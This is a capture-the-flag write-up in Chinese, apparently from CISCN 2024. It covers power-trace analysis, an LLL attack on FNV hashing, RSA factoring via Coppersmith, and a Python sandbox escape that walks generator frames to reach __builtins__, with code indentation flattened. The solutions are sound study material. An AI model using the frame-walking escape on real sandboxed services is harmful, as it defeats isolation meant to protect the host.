Misc
Power Trajectory Diagram
得到npz文件,打开后取范数排序。
import numpy as np
npz_file = np.load("attachment.npz")
index = npz_file['index']
input = npz_file['input']
output = npz_file['output']
trace = npz_file['trace']
norms = {}
for i in range(520):
if norms.get(index[i]) is None:
norms[index[i]] = []
norms[index[i]].append((np.linalg.norm(trace[i]),input[i]))
for key in norms:
norm = sorted(norms[key],key=lambda x: x[0])[::-1]
print(norm[0][1],end="")
得到 ziscn_2034,然后补全爆破即可得到flag。flag{_ciscn_2024}
通风机
搜索mwp文件找到STEP7Micro/WIN。
格式不兼容,在文件头补全GJK即可。
然后得到单层base64的flag。
火锅链观光打卡
直接答题就行
Crypto
hash
python2.7使用fnv算法。https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function,参考https://ctf-wiki.org/crypto/hash/fnv/,将异或替换成加法格基规约,最小规约即为解,于是可以计算key,从而得到flag。
a = 1000003
al = []
for i in range(8):
al.append(a^i)
wl = []
for i in range(6):
wl.append(al[i])
wl.append(2^7*al[7] + al[6])
m = matrix(ZZ,9,9)
x = 7457312583301101235
length = 7
mask = 0xffffffffffffffff
x = x ^^ length & mask
print(x)
wl.append(-x)
for i in range(8):
m[i,0] = wl[i]*2**20
m[i,i+1] = 1
m[-2,-1] = 2^ 8
m[-1,0] = 2^64*2**20
for v in m.LLL():
cr = []
if abs(v[-1]) == 256:
c = v[1:-1] * sgn(v[-1])
xx = x
for ci in c:
xx_ = (xx - ci)*inverse_mod(a,2**64)%2**64
cr.append(xx^^(xx_*a)%2**64)
xx = xx_
print(cr)
s = sum(a**i*c[i] for i in range(7)) + a ** 7 * 2 ** 7 * c[-1]
s %= 2**64
assert s == x
break
msg = 13903983817893117249931704406959869971132956255130487015289848690577655239262013033618370827749581909492660806312017
key = bytes(ci for ci in cr[::-1])
import hashlib
print(bytes.fromhex(hex(msg^int(hashlib.sha384(binascii.hexlify(key)).hexdigest(), 16))[2:]))古典密码
Atbash加密+base64decode+fence。
OvO
p,q接近且相差不大可以视作一个数。可以解方程得到p,q近似值。
然后利用p近似值可以通过coppersmith攻击得到p,q。
import sympy
n = 111922722351752356094117957341697336848130397712588425954225300832977768690114834703654895285440684751636198779555891692340301590396539921700125219784729325979197290342352480495970455903120265334661588516182848933843212275742914269686197484648288073599387074325226321407600351615258973610780463417788580083967
e = 37059679294843322451875129178470872595128216054082068877693632035071251762179299783152435312052608685562859680569924924133175684413544051218945466380415013172416093939670064185752780945383069447693745538721548393982857225386614608359109463927663728739248286686902750649766277564516226052064304547032760477638585302695605907950461140971727150383104
c = 14999622534973796113769052025256345914577762432817016713135991450161695032250733213228587506601968633155119211807176051329626895125610484405486794783282214597165875393081405999090879096563311452831794796859427268724737377560053552626220191435015101496941337770496898383092414492348672126813183368337602023823
rr = e // n
kk = rr - 2
x = sympy.symbols('x')
f = (kk+rr) * x ** 2 + (rr * n + rr + 65537 + 1 - e) * x + rr * n
p_ = int(sympy.solve(f)[1])
P.<x> = PolynomialRing(Zmod(n))
f = x + p_
x0 = f.small_roots(X=2^75,beta=0.4)[0]
p = int(p_ + x0)
assert n % p == 0
q = n // int(p)
phi = (p-1)*(q-1)
e = 65537 + kk * p + rr * ((p+1) * (q+1)) + 1
d = pow(e,-1,phi)
m = pow(c,d,n)
print(bytes.fromhex(hex(m)[2:]))Web
mossfern
看源代码发现是沙箱逃逸。尝试发现是栈帧沙箱逃逸
参考上文内容构造poc可以得到
def waff():
def f():
yield generator.gi_frame.f_back
generator = f()
frame = [x for x in generator][0]
str = frame.f_back.f_back.f_back.f_globals['_'*2+"builtins"+'_'*2].str
for i in str(frame.f_back.f_back.f_back.f_code.co_consts):
print(i)
waff()